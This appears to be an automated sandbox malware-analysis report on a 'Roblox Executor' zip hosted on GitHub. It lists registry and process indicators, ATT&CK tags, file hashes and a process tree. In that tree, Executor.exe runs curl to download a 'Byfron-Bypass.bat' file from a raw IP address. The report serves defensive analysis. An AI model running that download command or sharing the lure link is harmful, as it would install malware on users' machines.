hxxps://github[.]com/MeowScripts/Roblox-Executor/releases/download/v1[.]0[.]1/R-Loaderv1_0_1[.]zip

Analysis

max time kernel
150s
max time network
156s
platform
windows10-2004_x64
resource
win10v2004-20231020-en
resource tags

arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system
submitted
04/11/2023, 21:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/MeowScripts/Roblox-Executor/releases/download/v1.0.1/R-Loaderv1_0_1.zip

Score

1^/10

Malware Config

Signatures

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000_Classes\Local Settings	msedge.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
1288	msedge.exe
1288	msedge.exe
3904	msedge.exe
3904	msedge.exe
2600	chrome.exe
2600	chrome.exe
5044	identity_helper.exe
5044	identity_helper.exe
5588	msedge.exe
5588	msedge.exe
5452	msedge.exe
5452	msedge.exe
5736	msedge.exe
5736	msedge.exe
5736	msedge.exe
5736	msedge.exe
1820	chrome.exe
1820	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs

pid	Process
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
2600	chrome.exe
2600	chrome.exe
3904	msedge.exe
2600	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2600	chrome.exe
Token: SeCreatePagefilePrivilege	2600	chrome.exe
Token: SeShutdownPrivilege	2600	chrome.exe
Token: SeCreatePagefilePrivilege	2600	chrome.exe
Token: SeShutdownPrivilege	2600	chrome.exe
Token: SeCreatePagefilePrivilege	2600	chrome.exe
Token: SeShutdownPrivilege	2600	chrome.exe
Token: SeCreatePagefilePrivilege	2600	chrome.exe
Token: SeShutdownPrivilege	2600	chrome.exe
Token: SeCreatePagefilePrivilege	2600	chrome.exe
Token: SeShutdownPrivilege	2600	chrome.exe
Token: SeCreatePagefilePrivilege	2600	chrome.exe
Token: SeShutdownPrivilege	2600	chrome.exe
Token: SeCreatePagefilePrivilege	2600	chrome.exe
Token: SeShutdownPrivilege	2600	chrome.exe
Token: SeCreatePagefilePrivilege	2600	chrome.exe
Token: SeShutdownPrivilege	2600	chrome.exe
Token: SeCreatePagefilePrivilege	2600	chrome.exe
Token: SeShutdownPrivilege	2600	chrome.exe
Token: SeCreatePagefilePrivilege	2600	chrome.exe
Token: SeShutdownPrivilege	2600	chrome.exe
Token: SeCreatePagefilePrivilege	2600	chrome.exe
Token: SeShutdownPrivilege	2600	chrome.exe
Token: SeCreatePagefilePrivilege	2600	chrome.exe
Token: SeShutdownPrivilege	2600	chrome.exe
Token: SeCreatePagefilePrivilege	2600	chrome.exe
Token: SeShutdownPrivilege	2600	chrome.exe
Token: SeCreatePagefilePrivilege	2600	chrome.exe
Token: SeShutdownPrivilege	2600	chrome.exe
Token: SeCreatePagefilePrivilege	2600	chrome.exe
Token: SeShutdownPrivilege	2600	chrome.exe
Token: SeCreatePagefilePrivilege	2600	chrome.exe
Token: SeShutdownPrivilege	2600	chrome.exe
Token: SeCreatePagefilePrivilege	2600	chrome.exe
Token: SeShutdownPrivilege	2600	chrome.exe
Token: SeCreatePagefilePrivilege	2600	chrome.exe
Token: SeShutdownPrivilege	2600	chrome.exe
Token: SeCreatePagefilePrivilege	2600	chrome.exe
Token: SeShutdownPrivilege	2600	chrome.exe
Token: SeCreatePagefilePrivilege	2600	chrome.exe
Token: SeShutdownPrivilege	2600	chrome.exe
Token: SeCreatePagefilePrivilege	2600	chrome.exe
Token: SeShutdownPrivilege	2600	chrome.exe
Token: SeCreatePagefilePrivilege	2600	chrome.exe
Token: SeShutdownPrivilege	2600	chrome.exe
Token: SeCreatePagefilePrivilege	2600	chrome.exe
Token: SeShutdownPrivilege	2600	chrome.exe
Token: SeCreatePagefilePrivilege	2600	chrome.exe
Token: SeShutdownPrivilege	2600	chrome.exe
Token: SeCreatePagefilePrivilege	2600	chrome.exe
Token: SeShutdownPrivilege	2600	chrome.exe
Token: SeCreatePagefilePrivilege	2600	chrome.exe
Token: SeShutdownPrivilege	2600	chrome.exe
Token: SeCreatePagefilePrivilege	2600	chrome.exe
Token: SeShutdownPrivilege	2600	chrome.exe
Token: SeCreatePagefilePrivilege	2600	chrome.exe
Token: SeShutdownPrivilege	2600	chrome.exe
Token: SeCreatePagefilePrivilege	2600	chrome.exe
Token: SeShutdownPrivilege	2600	chrome.exe
Token: SeCreatePagefilePrivilege	2600	chrome.exe
Token: SeShutdownPrivilege	2600	chrome.exe
Token: SeCreatePagefilePrivilege	2600	chrome.exe
Token: SeShutdownPrivilege	2600	chrome.exe
Token: SeCreatePagefilePrivilege	2600	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
2600	chrome.exe
2600	chrome.exe
2600	chrome.exe
2600	chrome.exe
2600	chrome.exe
2600	chrome.exe
2600	chrome.exe
2600	chrome.exe
2600	chrome.exe
2600	chrome.exe
2600	chrome.exe
2600	chrome.exe
2600	chrome.exe
2600	chrome.exe
2600	chrome.exe
2600	chrome.exe
2600	chrome.exe
2600	chrome.exe
2600	chrome.exe
2600	chrome.exe
2600	chrome.exe
2600	chrome.exe
2600	chrome.exe
2600	chrome.exe
2600	chrome.exe
2600	chrome.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe

Suspicious use of SendNotifyMessage 48 IoCs

pid	Process
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
3904	msedge.exe
2600	chrome.exe
2600	chrome.exe
2600	chrome.exe
2600	chrome.exe
2600	chrome.exe
2600	chrome.exe
2600	chrome.exe
2600	chrome.exe
2600	chrome.exe
2600	chrome.exe
2600	chrome.exe
2600	chrome.exe
2600	chrome.exe
2600	chrome.exe
2600	chrome.exe
2600	chrome.exe
2600	chrome.exe
2600	chrome.exe
2600	chrome.exe
2600	chrome.exe
2600	chrome.exe
2600	chrome.exe
2600	chrome.exe
2600	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3904 wrote to memory of 3884	3904	msedge.exe	87
PID 3904 wrote to memory of 3884	3904	msedge.exe	87
PID 3904 wrote to memory of 3784	3904	msedge.exe	89
PID 3904 wrote to memory of 3784	3904	msedge.exe	89
PID 3904 wrote to memory of 3784	3904	msedge.exe	89
PID 3904 wrote to memory of 3784	3904	msedge.exe	89
PID 3904 wrote to memory of 3784	3904	msedge.exe	89
PID 3904 wrote to memory of 3784	3904	msedge.exe	89
PID 3904 wrote to memory of 3784	3904	msedge.exe	89
PID 3904 wrote to memory of 3784	3904	msedge.exe	89
PID 3904 wrote to memory of 3784	3904	msedge.exe	89
PID 3904 wrote to memory of 3784	3904	msedge.exe	89
PID 3904 wrote to memory of 3784	3904	msedge.exe	89
PID 3904 wrote to memory of 3784	3904	msedge.exe	89
PID 3904 wrote to memory of 3784	3904	msedge.exe	89
PID 3904 wrote to memory of 3784	3904	msedge.exe	89
PID 3904 wrote to memory of 3784	3904	msedge.exe	89
PID 3904 wrote to memory of 3784	3904	msedge.exe	89
PID 3904 wrote to memory of 3784	3904	msedge.exe	89
PID 3904 wrote to memory of 3784	3904	msedge.exe	89
PID 3904 wrote to memory of 3784	3904	msedge.exe	89
PID 3904 wrote to memory of 3784	3904	msedge.exe	89
PID 3904 wrote to memory of 3784	3904	msedge.exe	89
PID 3904 wrote to memory of 3784	3904	msedge.exe	89
PID 3904 wrote to memory of 3784	3904	msedge.exe	89
PID 3904 wrote to memory of 3784	3904	msedge.exe	89
PID 3904 wrote to memory of 3784	3904	msedge.exe	89
PID 3904 wrote to memory of 3784	3904	msedge.exe	89
PID 3904 wrote to memory of 3784	3904	msedge.exe	89
PID 3904 wrote to memory of 3784	3904	msedge.exe	89
PID 3904 wrote to memory of 3784	3904	msedge.exe	89
PID 3904 wrote to memory of 3784	3904	msedge.exe	89
PID 3904 wrote to memory of 3784	3904	msedge.exe	89
PID 3904 wrote to memory of 3784	3904	msedge.exe	89
PID 3904 wrote to memory of 3784	3904	msedge.exe	89
PID 3904 wrote to memory of 3784	3904	msedge.exe	89
PID 3904 wrote to memory of 3784	3904	msedge.exe	89
PID 3904 wrote to memory of 3784	3904	msedge.exe	89
PID 3904 wrote to memory of 3784	3904	msedge.exe	89
PID 3904 wrote to memory of 3784	3904	msedge.exe	89
PID 3904 wrote to memory of 3784	3904	msedge.exe	89
PID 3904 wrote to memory of 3784	3904	msedge.exe	89
PID 3904 wrote to memory of 1288	3904	msedge.exe	88
PID 3904 wrote to memory of 1288	3904	msedge.exe	88
PID 3904 wrote to memory of 1060	3904	msedge.exe	90
PID 3904 wrote to memory of 1060	3904	msedge.exe	90
PID 3904 wrote to memory of 1060	3904	msedge.exe	90
PID 3904 wrote to memory of 1060	3904	msedge.exe	90
PID 3904 wrote to memory of 1060	3904	msedge.exe	90
PID 3904 wrote to memory of 1060	3904	msedge.exe	90
PID 3904 wrote to memory of 1060	3904	msedge.exe	90
PID 3904 wrote to memory of 1060	3904	msedge.exe	90
PID 3904 wrote to memory of 1060	3904	msedge.exe	90
PID 3904 wrote to memory of 1060	3904	msedge.exe	90
PID 3904 wrote to memory of 1060	3904	msedge.exe	90
PID 3904 wrote to memory of 1060	3904	msedge.exe	90
PID 3904 wrote to memory of 1060	3904	msedge.exe	90
PID 3904 wrote to memory of 1060	3904	msedge.exe	90
PID 3904 wrote to memory of 1060	3904	msedge.exe	90
PID 3904 wrote to memory of 1060	3904	msedge.exe	90
PID 3904 wrote to memory of 1060	3904	msedge.exe	90
PID 3904 wrote to memory of 1060	3904	msedge.exe	90
PID 3904 wrote to memory of 1060	3904	msedge.exe	90
PID 3904 wrote to memory of 1060	3904	msedge.exe	90

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/MeowScripts/Roblox-Executor/releases/download/v1.0.1/R-Loaderv1_0_1.zip
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3904
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffab3746f8,0x7fffab374708,0x7fffab374718
  2⤵
  PID:3884
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1780,926457085249667636,11130720217886507608,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1288
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1780,926457085249667636,11130720217886507608,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:2
  2⤵
  PID:3784
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1780,926457085249667636,11130720217886507608,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2660 /prefetch:8
  2⤵
  PID:1060
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1780,926457085249667636,11130720217886507608,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
  2⤵
  PID:4108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1780,926457085249667636,11130720217886507608,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3464 /prefetch:1
  2⤵
  PID:3484
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1780,926457085249667636,11130720217886507608,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5320 /prefetch:1
  2⤵
  PID:896
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1780,926457085249667636,11130720217886507608,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5304 /prefetch:1
  2⤵
  PID:3908
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1780,926457085249667636,11130720217886507608,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5808 /prefetch:1
  2⤵
  PID:2012
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1780,926457085249667636,11130720217886507608,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5836 /prefetch:1
  2⤵
  PID:3768
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1780,926457085249667636,11130720217886507608,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6164 /prefetch:8
  2⤵
  PID:2056
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1780,926457085249667636,11130720217886507608,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6164 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5044
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1780,926457085249667636,11130720217886507608,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:1
  2⤵
  PID:5440
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1780,926457085249667636,11130720217886507608,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5728 /prefetch:8
  2⤵
  PID:5432
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1780,926457085249667636,11130720217886507608,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6036 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5588
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1780,926457085249667636,11130720217886507608,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6048 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5452
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1780,926457085249667636,11130720217886507608,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4048 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5736

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2600
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xd8,0x10c,0x7fff99fe9758,0x7fff99fe9768,0x7fff99fe9778
  2⤵
  PID:2084
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1736 --field-trial-handle=1880,i,2794580206121077744,5810302147939808672,131072 /prefetch:2
  2⤵
  PID:544
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 --field-trial-handle=1880,i,2794580206121077744,5810302147939808672,131072 /prefetch:8
  2⤵
  PID:5040
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2248 --field-trial-handle=1880,i,2794580206121077744,5810302147939808672,131072 /prefetch:8
  2⤵
  PID:2248
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3096 --field-trial-handle=1880,i,2794580206121077744,5810302147939808672,131072 /prefetch:1
  2⤵
  PID:4108
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3116 --field-trial-handle=1880,i,2794580206121077744,5810302147939808672,131072 /prefetch:1
  2⤵
  PID:640
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4964 --field-trial-handle=1880,i,2794580206121077744,5810302147939808672,131072 /prefetch:1
  2⤵
  PID:5868
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5016 --field-trial-handle=1880,i,2794580206121077744,5810302147939808672,131072 /prefetch:8
  2⤵
  PID:5908
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4956 --field-trial-handle=1880,i,2794580206121077744,5810302147939808672,131072 /prefetch:8
  2⤵
  PID:5952
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2840 --field-trial-handle=1880,i,2794580206121077744,5810302147939808672,131072 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1820

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2936

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4868

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:456

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:6024

C:\Users\Admin\Desktop\Executor\Executor.exe
"C:\Users\Admin\Desktop\Executor\Executor.exe"
1⤵
PID:5792
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "curl -o "C:\Users\Public\Byfron-Bypass.bat" "http://193.222.96.7/pldl321/Byfron-Bypass.bat""
  2⤵
  PID:5584
- - C:\Windows\system32\curl.exe
    curl -o "C:\Users\Public\Byfron-Bypass.bat" "http://193.222.96.7/pldl321/Byfron-Bypass.bat"
    3⤵
    PID:5788

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\9a0304d8bc93424284d36edc44724a2c /t 5732 /p 5792
1⤵
PID:5600

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
7a5257615b0f0db88edfa98e399287ae

SHA1
2a603dc5653716062d359151f3db7e740ab5dd24

SHA256
3eb4b627e78e6cb21406d80067e154e593973e019fe40003c08a70fab2a2e440

SHA512
f8bf7043257292970d3e734e91d36770fd3a88549d759f1fd13e950bd812faad8175b1facc2d3d7363f33717a5dcaa414493f3b9f79cc15a4d65bd08eeadbc98

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
369B

MD5
59552cd8841ae3143d5209e333e37373

SHA1
605caa17eff973513d808f7d19c9c940bfb54cac

SHA256
6c46aaa3e95391058feea5ebad995e5f42915d6074996287f9fc0cba767bc1b6

SHA512
463fbebd3bdf54e2c24ad7152e96012c18cc370366b71599e67d560b10f75033f8177902e16b6c10468e8d74bdfebff052fb9bac8ac47365d1309ba9bc3b891f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
7b0158ff3c9286290bcd1cad931595ed

SHA1
0b3bb965880934f6733534b4eac3928bde008348

SHA256
4d615086e57679da52d7c57d05e096e880cf15e664ff0ecd6ca331780fc5733f

SHA512
a78a67a5c14005d1b8d1b5f2262eb913f39d61a9bc135a13749e772fe96137038953cabc56546448d1dfd76eea2520478a0a0f6e008c9f54afdc467cbd1ba35b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
70933b49a2e7f81170a189c7ad50282b

SHA1
f59c3b783c234621359f165f98ba4c26b4a510b6

SHA256
52a49c275d7a7b0c3a20aebeeaba52c89d9b7e811e6a43c86b5df8b544fbe086

SHA512
de7d883d6452f919b802a7109a911f58c0c3ae9e2a133147482e221abec58691fe987f9eaa8e4e64fb2c8d3838888226af9f2f7635470be79faca0f21055ec04

Download Submit
